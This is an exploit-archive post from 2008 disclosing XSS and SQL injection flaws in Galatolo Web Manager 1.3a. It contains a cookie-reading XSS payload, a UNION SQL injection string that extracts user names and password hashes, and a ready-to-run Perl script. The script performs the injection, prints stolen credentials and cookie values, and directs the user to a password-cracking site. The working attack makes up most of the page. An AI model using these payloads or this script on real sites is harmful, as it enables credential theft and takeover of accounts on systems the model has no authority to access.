Home / exploits galatolo-sqlxss.txt
Posted on 15 July 2008
--==+============================================================================+==-- --==+ Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability +==-- --==+============================================================================+==-- [*] Discovered By: StAkeR ~ StAkeR@hotmail.it [+] Discovered On: 14 Jul 2008 [+] Download: http://gwm.dev-area.org/view.php?id=8 [*] Vulnerabilities: [*] XSS <= 1.3a [+] all.php?tag= [Code Javascript] [+] http://site.com/all.php?tag=<script>alert(document.cookie)</script> [*] SQL (plugin users) 1.3a [+] plugins/users/index.php?id= [Code SQL] [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1-- [*] Exploit: #!/usr/bin/perl use strict; use LWP::UserAgent; my $host = shift; my ($start,$content,@login); my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--"; if($host =~ /^http://?/i) { $start = new LWP::UserAgent or die "[+] Unable to connect "; $start->timeout(1); $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)"); $content = $start->get($host.$evilxx); if($content->is_success) { if($content->content =~ /%(.+?)%([0-9a-f]{32})/) { push(@login,$1,$2); print "[+] Login: "; print "[+] Username: $login[0] "; print "[+] Password: $login[1] "; print "[+] Cookie Session: "; print "[+] gwm_user = $login[0] "; print "[+] gwm_pass = $login[1] "; print "[+] Crack Password: "; print "[+] md5(md5(password)) for crack: "; print "[+] http://passcracking.com "; } else { print "[+] Exploit Failed "; print "[+] Site Not Vulnerable "; } } } else { print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection "; print "[+] Exploit Coded By: StAkeR ~ StAkeR@hotmail.it "; print "[+] Usage: Perl $0 <host> "; print "[+] Usage: Perl $0 http://site.com "; }
